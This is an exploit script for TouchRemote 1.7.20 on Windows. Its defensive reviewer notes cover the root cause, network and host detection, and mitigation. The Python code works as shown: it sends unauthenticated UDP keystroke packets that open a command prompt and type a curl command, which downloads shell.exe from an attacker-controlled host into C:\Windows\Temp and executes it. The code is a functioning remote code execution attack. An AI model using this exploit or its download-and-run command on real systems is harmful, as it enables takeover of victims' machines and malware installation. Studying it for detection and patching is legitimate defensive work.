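# Exploit Title: TouchRemote 1.7.20 - Remote Code Execution
# Date: 30/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://touchremote.eu/
# Software Link: https://touchremote.eu/download.php/?file=windows_latest
# Version: 1.7.20
# Tested on: Windows 10

'''
This exploit targets a flaw in TouchRemote for Windows where an unauthenticated
attacker can simulate keystrokes over UDP despite the presence of a password
protection feature. Even when a password is set, the application fails to
enforce it properly, allowing remote command execution and payload delivery
without user interaction.
'''

# Reviewer notes
# --------------
# Root cause (as stated above and visible below): nothing in this script sends
# a credential. The only thing preceding the key events is a fixed greeting,
# so the server acts on "SY.key=" datagrams without tying them to an
# authenticated session. The fix belongs in the server: check the password
# before any key event is honoured.
#
# Network detection: UDP datagrams to the TouchRemote listener (8888 in this
# PoC; confirm the port used in your deployment) whose body, after a 9-byte
# header, is the ASCII text "HELLO TOUCHREMOTE SERVER?" or starts with
# "SY.key=", coming from a host that is not a known controller.
#
# Host detection: cmd.exe opened from the Start menu shortly after such
# traffic, followed by curl.exe writing an executable into C:\Windows\Temp
# that is then launched from that directory.
#
# Mitigation: this page names no fixed version. Until a vendor fix is
# verified, limit the UDP port to known controller addresses in the host
# firewall, or keep the service stopped on networks you do not control.

import socket
import time

# Lab values from the original PoC (RFC 1918 addresses).
TARGET_IP = "192.168.8.101"
TARGET_PORT = 8888
LHOST = "192.168.8.100"
PAYLOAD = "shell.exe"

# The header carries the body length in a single byte.
_MAX_BODY_LEN = 0xFF


def build_packet(payload: str) -> bytes:
    """Frame *payload* the way the hand-written HELLO datagram is framed.

    Layout used by this PoC: four zero bytes, one length byte, four zero
    bytes, then the encoded text. The meaning of the fields is inferred from
    the greeting frame (0x19 == 25 == its length), not from protocol
    documentation.

    The length byte is computed from the encoded bytes rather than from the
    character count, so it always matches what is actually sent.

    Raises:
        ValueError: if the encoded payload does not fit the one-byte length
            field.
    """
    body = payload.encode()
    if len(body) > _MAX_BODY_LEN:
        raise ValueError(
            f"payload is {len(body)} bytes; the length field holds at most "
            f"{_MAX_BODY_LEN}"
        )
    header = b"\x00\x00\x00\x00" + len(body).to_bytes(1, 'big') + b"\x00\x00\x00\x00"
    return header + body


def _send(sock: socket.socket, text: str, pause: float) -> None:
    """Send one framed datagram to the configured target, then wait *pause* seconds."""
    sock.sendto(build_packet(text), (TARGET_IP, TARGET_PORT))
    time.sleep(pause)


def main() -> None:
    """Replay the PoC sequence: greeting, open a prompt, type and run one command."""
    # The context manager closes the socket on every exit path.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        try:
            print("[*] Starting TouchRemote key injection ...\n")

            print("[+] Handshake: Sending HELLO packet...")
            # Same bytes as the original hand-encoded frame (length byte 0x19).
            _send(sock, "HELLO TOUCHREMOTE SERVER?", 0.6)

            print("[+] Opening Command Prompt (WIN + cmd)...")
            _send(sock, "SY.key=WIN", 1)
            _send(sock, "SY.key=cmd", 1)
            # Longer pause here in the original, before anything is typed.
            _send(sock, "SY.key=RET", 4)

            print("[+] Typing payload...")
            curl_command = f"SY.key=curl {LHOST}/{PAYLOAD} -o C:\\Windows\\Temp\\{PAYLOAD} && C:\\Windows\\Temp\\{PAYLOAD}"
            _send(sock, curl_command, 0.6)

            print("[+] Executing payload...")
            _send(sock, "SY.key=RET", 0.6)

            print("\nPayload should now be running on the target.")
        except (OSError, ValueError) as e:
            # OSError: socket failure; ValueError: frame too long for the header.
            print(f"[-] Error: {e}")


# Guarded so that importing this file for analysis sends nothing.
if __name__ == "__main__":
    main()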